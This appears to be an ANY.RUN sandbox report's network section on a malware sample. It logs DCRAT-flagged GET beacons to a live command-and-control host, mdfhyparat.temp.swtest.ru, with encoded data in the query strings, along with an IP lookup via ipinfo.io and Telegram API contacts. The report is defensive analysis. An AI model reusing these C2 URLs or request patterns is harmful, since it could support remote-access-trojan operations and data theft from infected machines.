zaJZTS5pVe50WSzlUeOVTRE5UdJRET4VFRNRDND9EMJl2Tp1kMiNnSDxUaJxmUp9maJVjSIRWdWNjYqp0QMlWVtJWeGdFV0V1RaR3dXl1VKl2TpRjMiBHZXpVeKNETpV1RiNHbtRGMKNjYth3VRl2bqlUNShVYqp0QMl2Zq5UdjR0T4RzQPlXRqxkMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOigTNidjNllTMyMTOxAjY5MDOxADO5IDOhNWMjRGOmRTNiwiIhZ2Y5QWNhVzM3gTMzQzYkBTOmF2NmNjNihTYwETMhZDOjJjMklTZwIiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W
unknown
unknown
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?Q2L4uHpT4dky3lcFaeq4wl=l1solmQCIMKRyAEqW&ptTXPE9BOD1ak2pV=DBdEqnabmsTnFVyUaH2&4352bb6baae538c47675a6ba23a6dd3e=QOiNTYyQ2MyATOihTY2IzNmFjM0UjMhhTO5YGZygDZkVTN5kDM3QWYzQjM3ATO5cDNxITN0UTO&146a877accfd3523e6f308ba932392b2=QOxIGO0EjN4QGZkJ2M3UmYyIjZlNTNyIGNxATOhRWZiJWZjFGMmJjN&075811e976b3f3c96983b5d5554ae634=0VfiIiOigTNidjNllTMyMTOxAjY5MDOxADO5IDOhNWMjRGOmRTNiwiI0gDMkhTNxkTYjVTOlBDO1UWM5cTM3QzM0UDOjNDZ3UzN4MmZ4gTYjJiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W
unknown
unknown
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?Q2L4uHpT4dky3lcFaeq4wl=l1solmQCIMKRyAEqW&ptTXPE9BOD1ak2pV=DBdEqnabmsTnFVyUaH2&4352bb6baae538c47675a6ba23a6dd3e=QOiNTYyQ2MyATOihTY2IzNmFjM0UjMhhTO5YGZygDZkVTN5kDM3QWYzQjM3ATO5cDNxITN0UTO&146a877accfd3523e6f308ba932392b2=QOxIGO0EjN4QGZkJ2M3UmYyIjZlNTNyIGNxATOhRWZiJWZjFGMmJjN&92f1431c1a7bed8a72759fdb4dc10903=d1nI5YTNkNjM2UzNyADM4ETZ3UGZkZ2Y4MDMwcTZ5gDMxUWOjJWO4UWYmJiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W&075811e976b3f3c96983b5d5554ae634=QX9JiI6ICO1I2N2UWOxIzM5EDMilzM4EDM4kjM4E2YxMGZ4YGN1ICLikjN1Q2MyYTN3IDMwgTMldTZkRmZjhzMwAzNllDOwETZ5MmY5gTZhZmI6ISZlJjM4AzNwIjNjNmZjlTOyEDN0gzY1YzN2ETN4YWOwICLiITO1ATOlFjM3Q2YhRTN5UGO3ETO2ImYlljYwITZkdTMjRWZyQDMmJjI6ICMlF2Y3ATOlJWYkZWN5gjZlhTOkhTMjNzYhJmM4YjM3Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeOVTRE5UdJRET4VFRNRDND9EMJl2Tp1kMiNnSDxUaJxmUp9maJVjSIRWdWNjYqp0QMlWVtJWeGdFV0V1RaR3dXl1VKl2TpRjMiBHZXpVeKNETpV1RiNHbtRGMKNjYth3VRl2bqlUNShVYqp0QMl2Zq5UdjR0T4RzQPlXRqxkMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOigTNidjNllTMyMTOxAjY5MDOxADO5IDOhNWMjRGOmRTNiwiIhZ2Y5QWNhVzM3gTMzQzYkBTOmF2NmNjNihTYwETMhZDOjJjMklTZwIiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W
unknown
unknown
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?Q2L4uHpT4dky3lcFaeq4wl=l1solmQCIMKRyAEqW&ptTXPE9BOD1ak2pV=DBdEqnabmsTnFVyUaH2&4352bb6baae538c47675a6ba23a6dd3e=QOiNTYyQ2MyATOihTY2IzNmFjM0UjMhhTO5YGZygDZkVTN5kDM3QWYzQjM3ATO5cDNxITN0UTO&146a877accfd3523e6f308ba932392b2=QOxIGO0EjN4QGZkJ2M3UmYyIjZlNTNyIGNxATOhRWZiJWZjFGMmJjN&92f1431c1a7bed8a72759fdb4dc10903=d1nI5YTNkNjM2UzNyADM4ETZ3UGZkZ2Y4MDMwcTZ5gDMxUWOjJWO4UWYmJiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W&075811e976b3f3c96983b5d5554ae634=QX9JiI6ICO1I2N2UWOxIzM5EDMilzM4EDM4kjM4E2YxMGZ4YGN1ICLikjN1Q2MyYTN3IDMwgTMldTZkRmZjhzMwAzNllDOwETZ5MmY5gTZhZmI6ISZlJjM4AzNwIjNjNmZjlTOyEDN0gzY1YzN2ETN4YWOwICLiITO1ATOlFjM3Q2YhRTN5UGO3ETO2ImYlljYwITZkdTMjRWZyQDMmJjI6ICMlF2Y3ATOlJWYkZWN5gjZlhTOkhTMjNzYhJmM4YjM3Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeOVTRE5UdJRET4VFRNRDND9EMJl2Tp1kMiNnSDxUaJxmUp9maJVjSIRWdWNjYqp0QMlWVtJWeGdFV0V1RaR3dXl1VKl2TpRjMiBHZXpVeKNETpV1RiNHbtRGMKNjYth3VRl2bqlUNShVYqp0QMl2Zq5UdjR0T4RzQPlXRqxkMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOigTNidjNllTMyMTOxAjY5MDOxADO5IDOhNWMjRGOmRTNiwiIhZ2Y5QWNhVzM3gTMzQzYkBTOmF2NmNjNihTYwETMhZDOjJjMklTZwIiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W
unknown
unknown
3100
SIHClient.exe
GET
200
2.16.168.124:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?Q2L4uHpT4dky3lcFaeq4wl=l1solmQCIMKRyAEqW&ptTXPE9BOD1ak2pV=DBdEqnabmsTnFVyUaH2&4352bb6baae538c47675a6ba23a6dd3e=QOiNTYyQ2MyATOihTY2IzNmFjM0UjMhhTO5YGZygDZkVTN5kDM3QWYzQjM3ATO5cDNxITN0UTO&146a877accfd3523e6f308ba932392b2=QOxIGO0EjN4QGZkJ2M3UmYyIjZlNTNyIGNxATOhRWZiJWZjFGMmJjN&f0fbc061aff21c5e4d39c5b1e44f8b89=QX9JSUmlWVXJGcS5mYxo0MjxmWYllekhlWwpFWalnSXp1MWJjWrxWbjlGeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJZHbHpVMGVUSzsmeKRkRFlkcWdEZzZ0VaNlQTxUenNUS1xWRJxWNXFWT1cEW5hnVkJkQ55UNjlXUCJUehxmUIJGaW1WVnBTaN9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOigTNidjNllTMyMTOxAjY5MDOxADO5IDOhNWMjRGOmRTNiwiI0gDMkhTNxkTYjVTOlBDO1UWM5cTM3QzM0UDOjNDZ3UzN4MmZ4gTYjJiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W
unknown
unknown
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?Q2L4uHpT4dky3lcFaeq4wl=l1solmQCIMKRyAEqW&ptTXPE9BOD1ak2pV=DBdEqnabmsTnFVyUaH2&4352bb6baae538c47675a6ba23a6dd3e=QOiNTYyQ2MyATOihTY2IzNmFjM0UjMhhTO5YGZygDZkVTN5kDM3QWYzQjM3ATO5cDNxITN0UTO&146a877accfd3523e6f308ba932392b2=QOxIGO0EjN4QGZkJ2M3UmYyIjZlNTNyIGNxATOhRWZiJWZjFGMmJjN&92f1431c1a7bed8a72759fdb4dc10903=d1nI5YTNkNjM2UzNyADM4ETZ3UGZkZ2Y4MDMwcTZ5gDMxUWOjJWO4UWYmJiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W&075811e976b3f3c96983b5d5554ae634=QX9JiI6ICO1I2N2UWOxIzM5EDMilzM4EDM4kjM4E2YxMGZ4YGN1ICLikjN1Q2MyYTN3IDMwgTMldTZkRmZjhzMwAzNllDOwETZ5MmY5gTZhZmI6ISZlJjM4AzNwIjNjNmZjlTOyEDN0gzY1YzN2ETN4YWOwICLiITO1ATOlFjM3Q2YhRTN5UGO3ETO2ImYlljYwITZkdTMjRWZyQDMmJjI6ICMlF2Y3ATOlJWYkZWN5gjZlhTOkhTMjNzYhJmM4YjM3Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeOVTRE5UdJRET4VFRNRDND9EMJl2Tp1kMiNnSDxUaJxmUp9maJVjSIRWdWNjYqp0QMlWVtJWeGdFV0V1RaR3dXl1VKl2TpRjMiBHZXpVeKNETpV1RiNHbtRGMKNjYth3VRl2bqlUNShVYqp0QMl2Zq5UdjR0T4RzQPlXRqxkMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOigTNidjNllTMyMTOxAjY5MDOxADO5IDOhNWMjRGOmRTNiwiIhZ2Y5QWNhVzM3gTMzQzYkBTOmF2NmNjNihTYwETMhZDOjJjMklTZwIiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W
unknown
unknown
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?Q2L4uHpT4dky3lcFaeq4wl=l1solmQCIMKRyAEqW&ptTXPE9BOD1ak2pV=DBdEqnabmsTnFVyUaH2&4352bb6baae538c47675a6ba23a6dd3e=QOiNTYyQ2MyATOihTY2IzNmFjM0UjMhhTO5YGZygDZkVTN5kDM3QWYzQjM3ATO5cDNxITN0UTO&146a877accfd3523e6f308ba932392b2=QOxIGO0EjN4QGZkJ2M3UmYyIjZlNTNyIGNxATOhRWZiJWZjFGMmJjN&92f1431c1a7bed8a72759fdb4dc10903=d1nI5YTNkNjM2UzNyADM4ETZ3UGZkZ2Y4MDMwcTZ5gDMxUWOjJWO4UWYmJiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W&075811e976b3f3c96983b5d5554ae634=QX9JiI6ICO1I2N2UWOxIzM5EDMilzM4EDM4kjM4E2YxMGZ4YGN1ICLikjN1Q2MyYTN3IDMwgTMldTZkRmZjhzMwAzNllDOwETZ5MmY5gTZhZmI6ISZlJjM4AzNwIjNjNmZjlTOyEDN0gzY1YzN2ETN4YWOwICLiITO1ATOlFjM3Q2YhRTN5UGO3ETO2ImYlljYwITZkdTMjRWZyQDMmJjI6ICMlF2Y3ATOlJWYkZWN5gjZlhTOkhTMjNzYhJmM4YjM3Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeOVTRE5UdJRET4VFRNRDND9EMJl2Tp1kMiNnSDxUaJxmUp9maJVjSIRWdWNjYqp0QMlWVtJWeGdFV0V1RaR3dXl1VKl2TpRjMiBHZXpVeKNETpV1RiNHbtRGMKNjYth3VRl2bqlUNShVYqp0QMl2Zq5UdjR0T4RzQPlXRqxkMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOigTNidjNllTMyMTOxAjY5MDOxADO5IDOhNWMjRGOmRTNiwiIhZ2Y5QWNhVzM3gTMzQzYkBTOmF2NmNjNihTYwETMhZDOjJjMklTZwIiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W
unknown
unknown
3100
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7280
StartMenuExperienceHost.exe
77.222.40.238:80
mdfhyparat.temp.swtest.ru
SpaceWeb Ltd
RU
malicious
7280
StartMenuExperienceHost.exe
34.117.59.81:443
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
whitelisted
7280
StartMenuExperienceHost.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
whitelisted
3100
SIHClient.exe
20.109.210.53:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3100
SIHClient.exe
2.16.168.124:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 216.58.212.174
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.250
whitelisted
mdfhyparat.temp.swtest.ru
  • 77.222.40.238
malicious
ipinfo.io
  • 34.117.59.81
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
crl.microsoft.com
  • 2.16.168.124
  • 2.16.168.114
whitelisted
www.microsoft.com
  • 23.219.150.101
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET TA_ABUSED_SERVICES Commonly Abused Domain Service Domain in DNS Lookup (temp .swtest .ru)
7280
StartMenuExperienceHost.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
7280
StartMenuExperienceHost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
7280
StartMenuExperienceHost.exe
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ipinfo.io
2196
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2196
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
7280
StartMenuExperienceHost.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
7280
StartMenuExperienceHost.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
3cfca059a9110f3137c1786a194b2f6e.exe